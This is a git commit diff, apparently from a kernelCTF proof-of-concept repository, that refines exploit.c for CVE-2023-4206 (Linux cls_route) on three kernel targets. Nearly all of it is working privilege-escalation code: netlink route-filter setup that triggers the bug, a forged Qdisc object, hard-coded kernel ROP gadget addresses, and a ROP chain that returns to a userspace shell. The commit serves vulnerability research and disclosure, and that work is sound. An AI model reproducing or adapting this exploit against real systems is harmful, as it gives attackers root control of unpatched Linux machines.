CVE-2023-4206_lts_cos_mitigation_2: Improve exploit readability as per review comments

4ab48b3f1ded2472 · 4ab48b3f1ded2472 · commit 4afe12f1df6e · 2025-03-18T03:31:11.000+01:00
diff --git a/pocs/linux/kernelctf/CVE-2023-4206_lts_cos_mitigation_2/exploit/cos-101-17162.127.42/exploit.c b/pocs/linux/kernelctf/CVE-2023-4206_lts_cos_mitigation_2/exploit/cos-101-17162.127.42/exploit.c
@@ -171,11 +171,9 @@ static int g_pwned;
 
 void __attribute__((naked)) after_pwn()
 {
-// Fix user stack and recover eflags since we didn't do it when returning from kernel mode
+// Fix user stack since we didn't do when returning from kernel mode
         asm volatile(
                 "mov %0, %%rsp\n"
-                "push $0x293\n"
-                "popf"
                 :: "r" (g_mmapped_buf + MMAP_SIZE - 0x100)
         );
         
@@ -376,8 +374,6 @@ static void netlink_device_change(struct nlmsg* nlmsg, int sock,
                 netlink_attr(nlmsg, IFLA_MASTER, &ifindex, sizeof(ifindex));
         }
 
-        unsigned int mtu = 0x001f0000L;
-        netlink_attr(nlmsg, IFLA_MTU, &mtu, sizeof(mtu));
         if (macsize)
                 netlink_attr(nlmsg, IFLA_ADDRESS, mac, macsize);
 
@@ -529,10 +525,12 @@ void add_route_filter(uint32_t parent, uint32_t chain, uint32_t handle, uint32_t
         hdr.tcm_family = AF_UNSPEC;
         hdr.tcm_ifindex = 1;
         hdr.tcm_parent = parent;
-        hdr.tcm_handle = handle | 0xffff0000;
 
-// proto = ETH_P_ALL
-        hdr.tcm_info = 0x300 | (prio << 16);
+// cls_route handles contain following parameters encoded in uint32_t: source realm, source interface and destination realm
+// This means we only filter by destination realm, any source will match:
+        hdr.tcm_handle = (handle & 0xff) | (0xffff << 16);
+
+        hdr.tcm_info = TC_H_MAKE(prio << 16, htons(ETH_P_ALL));
 
         netlink_init(&nlmsg, RTM_NEWTFILTER, flags, &hdr, sizeof(hdr));
 
@@ -661,7 +659,8 @@ size_t prepare_rop2(uint64_t *rop2)
 
         *rop2++ = kaddr(POP_R11_R10_R9_R8_RDI_RSI_RDX_RCX);
 // eflags
-        *rop2++ = 0x293;
+        *rop2++ = 0;
+
         rop2 += 6;
 
 // Userspace RIP
@@ -793,6 +792,8 @@ int main(int argc, char **argv)
 
         delete_class(0x10001);
 
+// @sleep(kernel_func="qdisc_free_cb",
+//      desc="wait for RCU to trigger Qdisc object removal")
         sleep(1);
 
         prepare_fake_qdisc(g_mmapped_buf);
@@ -804,8 +805,6 @@ int main(int argc, char **argv)
 
         trigger_classify();
 
-        sleep(5);
-
         if (!g_pwned) {
                 printf("Failed to trigger vuln, try again!\n");
                 _exit(0);
diff --git a/pocs/linux/kernelctf/CVE-2023-4206_lts_cos_mitigation_2/exploit/lts-6.1.36/exploit.c b/pocs/linux/kernelctf/CVE-2023-4206_lts_cos_mitigation_2/exploit/lts-6.1.36/exploit.c
@@ -171,11 +171,9 @@ static int g_pwned;
 
 void __attribute__((naked)) after_pwn()
 {
-// Fix user stack and recover eflags since we didn't do it when returning from kernel mode
+// Fix user stack since we didn't do when returning from kernel mode
         asm volatile(
                 "mov %0, %%rsp\n"
-                "push $0x293\n"
-                "popf"
                 :: "r" (g_mmapped_buf + MMAP_SIZE - 0x100)
         );
         
@@ -376,8 +374,6 @@ static void netlink_device_change(struct nlmsg* nlmsg, int sock,
                 netlink_attr(nlmsg, IFLA_MASTER, &ifindex, sizeof(ifindex));
         }
 
-        unsigned int mtu = 0x001f0000L;
-        netlink_attr(nlmsg, IFLA_MTU, &mtu, sizeof(mtu));
         if (macsize)
                 netlink_attr(nlmsg, IFLA_ADDRESS, mac, macsize);
 
@@ -529,10 +525,12 @@ void add_route_filter(uint32_t parent, uint32_t chain, uint32_t handle, uint32_t
         hdr.tcm_family = AF_UNSPEC;
         hdr.tcm_ifindex = 1;
         hdr.tcm_parent = parent;
-        hdr.tcm_handle = handle | 0xffff0000;
 
-// proto = ETH_P_ALL
-        hdr.tcm_info = 0x300 | (prio << 16);
+// cls_route handles contain following parameters encoded in uint32_t: source realm, source interface and destination realm
+// This means we only filter by destination realm, any source will match:
+        hdr.tcm_handle = (handle & 0xff) | (0xffff << 16);
+
+        hdr.tcm_info = TC_H_MAKE(prio << 16, htons(ETH_P_ALL));
 
         netlink_init(&nlmsg, RTM_NEWTFILTER, flags, &hdr, sizeof(hdr));
 
@@ -661,7 +659,8 @@ size_t prepare_rop2(uint64_t *rop2)
 
         *rop2++ = kaddr(POP_R11_R10_R9_R8_RDI_RSI_RDX_RCX);
 // eflags
-        *rop2++ = 0x293;
+        *rop2++ = 0;
+
         rop2 += 6;
 
 // Userspace RIP
@@ -793,6 +792,8 @@ int main(int argc, char **argv)
 
         delete_class(0x10001);
 
+// @sleep(kernel_func="qdisc_free_cb",
+//      desc="wait for RCU to trigger Qdisc object removal")
         sleep(1);
 
         prepare_fake_qdisc(g_mmapped_buf);
@@ -804,8 +805,6 @@ int main(int argc, char **argv)
 
         trigger_classify();
 
-        sleep(5);
-
         if (!g_pwned) {
                 printf("Failed to trigger vuln, try again!\n");
                 _exit(0);
diff --git a/pocs/linux/kernelctf/CVE-2023-4206_lts_cos_mitigation_2/exploit/mitigation-6.1/exploit.c b/pocs/linux/kernelctf/CVE-2023-4206_lts_cos_mitigation_2/exploit/mitigation-6.1/exploit.c
@@ -166,16 +166,15 @@ static char *g_sh_argv[] = {"sh", NULL};
 static int g_status;
 
 #define MMAP_SIZE 0x8000
+#define XATTR_HEAD_SIZE 0x20
 
 static int g_pwned;
 
 void __attribute__((naked)) after_pwn()
 {
-// Fix user stack and recover eflags since we didn't do it when returning from kernel mode
+// Fix user stack since we didn't do when returning from kernel mode
         asm volatile(
                 "mov %0, %%rsp\n"
-                "push $0x293\n"
-                "popf"
                 :: "r" (g_mmapped_buf + MMAP_SIZE - 0x100)
         );
         
@@ -377,8 +376,6 @@ static void netlink_device_change(struct nlmsg* nlmsg, int sock,
                 netlink_attr(nlmsg, IFLA_MASTER, &ifindex, sizeof(ifindex));
         }
 
-        unsigned int mtu = 0x001f0000L;
-        netlink_attr(nlmsg, IFLA_MTU, &mtu, sizeof(mtu));
         if (macsize)
                 netlink_attr(nlmsg, IFLA_ADDRESS, mac, macsize);
 
@@ -393,8 +390,8 @@ static void setup_network(char *link_name)
 
         netlink_device_change(&nlmsg, sock, "lo", true, 0, NULL, 0, link_name);
 
-
         close(sock);
+
         g_nl_sock = nl_cli_alloc_socket();
         nl_cli_connect(g_nl_sock, NETLINK_ROUTE);
         g_link_cache = nl_cli_link_alloc_cache(g_nl_sock);
@@ -575,10 +572,12 @@ void add_route_filter(uint32_t parent, uint32_t chain, uint32_t handle, uint32_t
         hdr.tcm_family = AF_UNSPEC;
         hdr.tcm_ifindex = 1;
         hdr.tcm_parent = parent;
-        hdr.tcm_handle = handle | 0xffff0000;
 
-// proto = ETH_P_ALL
-        hdr.tcm_info = 0x300 | (prio << 16);
+// cls_route handles contain following parameters encoded in uint32_t: source realm, source interface and destination realm
+// This means we only filter by destination realm, any source will match:
+        hdr.tcm_handle = (handle & 0xff) | (0xffff << 16);
+
+        hdr.tcm_info = TC_H_MAKE(prio << 16, htons(ETH_P_ALL));
 
         netlink_init(&nlmsg, RTM_NEWTFILTER, flags, &hdr, sizeof(hdr));
 
@@ -793,7 +792,7 @@ void *trigger_classify()
 
 int alloc_xattr3(int fd, char *attr, size_t size, void *buf)
 {
-        int res = fsetxattr(fd, attr, buf, size - 32, XATTR_CREATE);
+        int res = fsetxattr(fd, attr, buf, size - XATTR_HEAD_SIZE, XATTR_CREATE);
         if (res < 0) {
                 err(1, "fsetxattr");
         }
@@ -859,7 +858,7 @@ size_t prepare_rop2(char *buf)
 
         *rop2++ = pop_r11_6_rcx;
 // eflags
-        *rop2++ = 0x293;
+        *rop2++ = 0;
         rop2 += 6;
 
 // Userspace RIP
@@ -872,7 +871,8 @@ size_t prepare_rop2(char *buf)
 void prepare_fake_qdisc(char *buf)
 {
         uint64_t ret = kaddr(0xffffffff810d502d);
-        uint64_t rw_buffer = kaddr(0xffffffff83675360);
+// Any unused and writable page of memory will do
+        uint64_t rw_buffer = kaddr(0xffffffff84700000);
         uint64_t pop_rsi_rdx_rcx = kaddr(0xffffffff810289ce);
         uint64_t copy_from_user = kaddr(0xffffffff81fd4820);
 
@@ -888,11 +888,12 @@ void prepare_fake_qdisc(char *buf)
 // 0xffffffff81d5747e: push r14 ; jmp qword [rsi+0x66]
         uint64_t g2 = kaddr(0xffffffff81d5747e);
         uint64_t pop_rsp = kaddr(0xffffffff81404820);
-        uint64_t pop_7 = kaddr(0xffffffff810289a5);
+        uint64_t pop_r10_r9_r8_rdi_rsi_rdx_rcx = kaddr(0xffffffff810289a5);
         uint64_t pop_rdi_rsi_rdx_rcx = kaddr(0xffffffff8106fb3b);
 
         *(uint64_t *) (buf) = g1;
-// stab
+
+// stab pointer (struct qdisc_size_table *stab) has to be null or __qdisc_calculate_pkt_len() (called from qdisc_calculate_pkt_len/__dev_xmit_skb) will crash trying to use it before enqueuing the packet
         *(uint64_t *) (buf + 0x20) = 0;
 
         *(uint64_t *) (buf + 0x28) = g2;
@@ -906,7 +907,7 @@ void prepare_fake_qdisc(char *buf)
         size_t rop2_len = prepare_rop2(rop2);
 
 // jump over 0x66
-        *rop++ = pop_7;
+        *rop++ = pop_r10_r9_r8_rdi_rsi_rdx_rcx;
         rop += 7;
 
         *rop++ = pop_rdi_rsi_rdx_rcx;
